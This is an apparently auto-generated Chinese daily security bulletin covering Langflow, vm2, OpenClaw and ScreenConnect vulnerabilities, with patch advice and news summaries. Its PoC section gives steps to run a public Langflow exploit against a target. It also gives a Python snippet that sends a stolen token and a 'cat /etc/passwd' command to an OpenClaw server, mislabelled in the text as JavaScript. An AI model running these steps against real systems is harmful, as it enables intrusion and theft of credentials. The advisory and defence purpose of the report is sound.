每日安全情报报告

日期:2026-03-28 | 编辑:自动化安全情报系统 | 版本:v1.0


一、高危漏洞速报

🔴 CVE-2026-33017 — Langflow 未授权远程代码执行

字段 详情
CVE 编号 CVE-2026-33017
漏洞类型 缺失身份验证 + 代码注入(Remote Code Execution)
受影响组件 Langflow ≤ 1.8.1
CVSS 评分 9.3 / 10(Critical)
利用状态 ⚠️ 已在野利用,披露后 20 小时即被武器化
参考链接 FreeBuf 分析 · CSDN 详解

漏洞原理:Langflow 的公共 Flow 构建端点(/api/v1/build/{flow_id}/flow)无需认证即可访问,攻击者可向该接口提交包含恶意代码的 Flow 数据,代码经 validate.py 中的 prepare_global_scope() 函数执行后,实现任意命令执行,进而窃取 API 密钥并完全控制服务器。

修复建议
- 立即升级至 Langflow 1.8.2 或更高版本
- 若无法立即升级,通过网络防火墙封锁公开访问的 Flow 构建端点
- 审计已部署实例,检查是否存在可疑的 Flow 执行记录


🔴 CVE-2026-22709 — vm2 沙箱逃逸

字段 详情
CVE 编号 CVE-2026-22709
漏洞类型 沙箱逃逸(Sandbox Escape)
受影响组件 Node.js vm2 库(数百万应用受影响)
CVSS 评分 9.8 / 10(Critical)
利用条件 无需权限、攻击复杂度低
参考链接 FreeBuf 原文 · CSDN 分析

漏洞原理:攻击者可构造特殊 JavaScript 代码,绕过 vm2 的沙箱隔离机制,在宿主机上执行任意代码。该漏洞无需特权,攻击复杂度极低,对使用 vm2 的 Node.js 应用构成严重威胁。

修复建议
- 检查项目是否依赖 vm2 库(npm list vm2
- vm2 项目已停止维护,建议迁移至 isolated-vmvm2-node
- 短期内,限制 vm2 可执行代码的输入来源,做好输入过滤


🟠 CVE-2026-25253 — OpenClaw AI 一键 RCE

字段 详情
CVE 编号 CVE-2026-25253
漏洞类型 令牌劫持 + 远程代码执行
受影响组件 OpenClaw / Clawdbot / Moltbot AI 助手框架
CVSS 评分 8.8 / 10(High)
在野情况 超过 24,478 个公开暴露实例受影响
参考链接 深度分析 · CSDN POC 报告

漏洞原理:攻击者通过诱导用户点击恶意链接,劫持认证令牌后实现"一键 RCE"。该漏洞结合了 WebSocket 劫持与认证令牌窃取技术,攻击链较短,危害极大。

修复建议
- 立即检查并更新至最新版本
- 审计公开暴露的 OpenClaw 实例,避免对公网直接开放
- 实施严格的 CORS 策略和 WebSocket 认证机制


🟠 ScreenConnect 设备密钥泄露漏洞(ConnectWise)

字段 详情
漏洞类型 设备密钥信息泄露
受影响组件 ConnectWise ScreenConnect
危险等级 高危
修复状态 ✅ 官方已发布安全更新
参考链接 安全圈报道

漏洞原理:ScreenConnect 在设备密钥处理机制上存在安全缺陷,攻击者可能通过该漏洞泄露敏感设备密钥,进而在远程访问管理场景中实施攻击。

修复建议
- 立即应用 ConnectWise 发布的最新安全补丁
- 检查现有设备连接是否存在异常访问行为
- 更换可能已泄露的设备密钥


二、漏洞 PoC 速递

PoC #1 — CVE-2026-33017 Langflow 未授权 RCE

来源:GitHub — MaxMnMl/langflow-CVE-2026-33017-poc

链接https://github.com/MaxMnMl/langflow-CVE-2026-33017-poc

漏洞触发原理
Langflow <= 1.8.1 暴露了无需认证的公共流构建接口,接受攻击者控制的 Flow 数据(包含任意代码),该代码通过 validate.pyprepare_global_scope() 函数执行。

利用步骤概述

# 1. 克隆 POC 仓库
git clone https://github.com/MaxMnMl/langflow-CVE-2026-33017-poc.git
cd langflow-CVE-2026-33017-poc

# 2. 安装依赖
pip install -r requirements.txt

# 3. 执行 POC(指定目标地址)
python poc.py --target http://<target-ip>:7860 --cmd "id"

# 预期输出示例(命令执行成功):
# [+] Target: http://<target-ip>:7860
# [+] Sending malicious flow payload...
# [+] Response: {"result": "uid=1000(langflow) gid=1000(langflow)"}

防御检测要点
- 监控 /api/v1/build/ 路径的非正常 POST 请求
- 检查系统日志中是否有非预期命令执行记录


PoC #2 — Apifox 供应链投毒(Electron RCE)

来源:白帽酱博客 — rce.moe

链接https://rce.moe/2026/03/25/apifox-supply-chain-attack-analysis/

漏洞背景
Apifox 桌面端基于 Electron 框架开发,因未严格启用 sandbox 参数且暴露了 Node.js API,攻击者可通过供应链投毒将恶意代码植入 Apifox 更新包,从而在用户机器上执行任意系统命令。

攻击链概述

恶意更新包注入
    ↓
Electron 渲染进程加载恶意 JS
    ↓
利用 Node.js API(fs/child_process)执行系统命令
    ↓
持久化后门 + 数据窃取(API 密钥、请求体内容等)

复现关键条件
1. Electron 应用未开启 sandbox: truenodeIntegration: true 或暴露 preload bridge)
2. 更新分发渠道未做完整性校验(无签名验证)
3. 渲染进程可访问 require('child_process')

防御建议
- 所有 Electron 应用强制开启 contextIsolation: true + sandbox: true
- 对软件更新包实施代码签名验证
- 开发者审计 Apifox 是否在受控环境(如 CI/CD)中运行


PoC #3 — CVE-2026-25253 OpenClaw 令牌劫持 RCE

来源:云盘 Plus 技术分析

链接https://yunpan.plus/t/17908-1-1

利用步骤概述

# 攻击载体:构造恶意 WebSocket 请求劫持用户令牌
# 1. 搭建恶意页面,嵌入如下 JS:

import websocket
import json

# 目标 OpenClaw 实例
TARGET = "ws://target-openclaw:8080/ws"

# 劫持令牌后伪造身份发送命令
payload = {
    "type": "execute",
    "token": "<stolen_token>",
    "command": "cat /etc/passwd"
}

ws = websocket.create_connection(TARGET)
ws.send(json.dumps(payload))
result = ws.recv()
print("[RCE Result]", result)

防御要点
- 在 WebSocket 握手阶段验证 Origin
- 实施基于时间戳的令牌有效期控制
- 避免将 OpenClaw 实例暴露在公网


三、网络安全最新资讯

📰 文章一:IBM X-Force 2026 威胁情报报告:AI 驱动攻击激增,基础漏洞问题更严峻

摘要:IBM 发布《2026年 X-Force 威胁情报指数报告》,报告指出网络犯罪分子正以前所未有的速度利用基础安全漏洞。勒索软件同比激增 49%,AI 工具使攻击者能更快速地识别和利用企业弱点。然而,大多数入侵事件仍依赖未修补漏洞、凭据盗窃和配置错误。报告强调,AI 安全虽重要,但企业应首先补好"基础课"。

链接https://china.newsroom.ibm.com/2026-03-03-IBM-2026-X-Force-,AI


📰 文章二:Langflow 漏洞 CVE-2026-33017 在披露 20 小时内引发野外攻击

摘要:Langflow 平台存在的严重 RCE 漏洞(CVE-2026-33017)在安全研究人员公开披露后仅 20 小时,即有攻击者开始在野外利用。该漏洞结合了缺失身份验证和代码注入问题,攻击者无需登录即可执行任意代码、窃取 API 密钥,并控制运行 Langflow 的服务器。该事件再次证明漏洞武器化速度正在加速。

链接https://www.msn.cn/zh-cn/news/other/关键Langflow漏洞CVE-2026-33017在披露20小时内引发攻击/ar-AA1ZbC9y


📰 文章三:Apifox 供应链投毒攻击完整技术分析

摘要:安全研究员「白帽酱」发布针对 Apifox 的供应链投毒攻击完整技术报告。Apifox 桌面端基于 Electron 框架,因未启用严格沙箱并暴露 Node.js API,攻击者可通过污染更新分发链路植入后门。一旦成功,攻击者可完全访问用户本地文件系统,并窃取所有 API 请求数据(含认证令牌)。该事件提醒开发者工具链同样是高价值攻击目标。

链接https://rce.moe/2026/03/25/apifox-supply-chain-attack-analysis/


📰 文章四:2026年3月技术安全洞察:量子计算密码突破与硬件安全演进

摘要:西交利物浦大学完成 Kyber-256-k1 密码挑战,Google 警告量子计算"Q-Day"最早可能于 2029 年到来。与此同时,嵌入式处理器安全架构迎来范式转变,AMD 等厂商积极推进硬件级安全能力建设。随着量子计算威胁临近,后量子密码(PQC)标准化和企业迁移计划正变得日益紧迫。

链接https://blog.csdn.net/qq_40652101/article/details/159539752


📰 文章五:国际刑警组织捣毁 4.5 万个恶意 IP,全球网络安全协同防御加速

摘要:2026年3月15日全球安全日报显示,国际刑警组织成功捣毁 4.5 万个恶意 IP 地址,同时披露 GlassWorm 供应链攻击事件以及针对东南亚军事组织的 APT 攻击行动。微软为此专门发布 Windows 11 热补丁,修复 RRAS(路由和远程访问服务)高危漏洞,彰显全球安全社区协同响应能力的持续提升。

链接https://cloud.tencent.com/developer/article/2646122


四、安全建议总结

优先级 行动项
🔴 立即 升级 Langflow 至 ≥ 1.8.2,封锁 /api/v1/build/ 公网访问
🔴 立即 评估 Node.js 项目对 vm2 的依赖,规划迁移至 isolated-vm
🟠 本周内 为 ScreenConnect 应用最新安全补丁,轮换设备密钥
🟠 本周内 审计 OpenClaw 等 AI Agent 框架部署情况,限制公网暴露
🟡 近期 审查 Electron 应用(如 Apifox)sandbox 配置,验证更新包签名
🟡 规划中 制定后量子密码迁移评估计划,关注 NIST PQC 标准进展

本报告由自动化安全情报系统生成,数据来源:FreeBuf、CSDN 安全频道、IBM X-Force、腾讯云开发者社区、安全圈等权威来源。

⚠️ 免责声明:PoC 内容仅用于安全研究与防御目的,请勿用于未经授权的攻击行为。

Logo

AtomGit 是由开放原子开源基金会联合 CSDN 等生态伙伴共同推出的新一代开源与人工智能协作平台。平台坚持“开放、中立、公益”的理念,把代码托管、模型共享、数据集托管、智能体开发体验和算力服务整合在一起,为开发者提供从开发、训练到部署的一站式体验。

更多推荐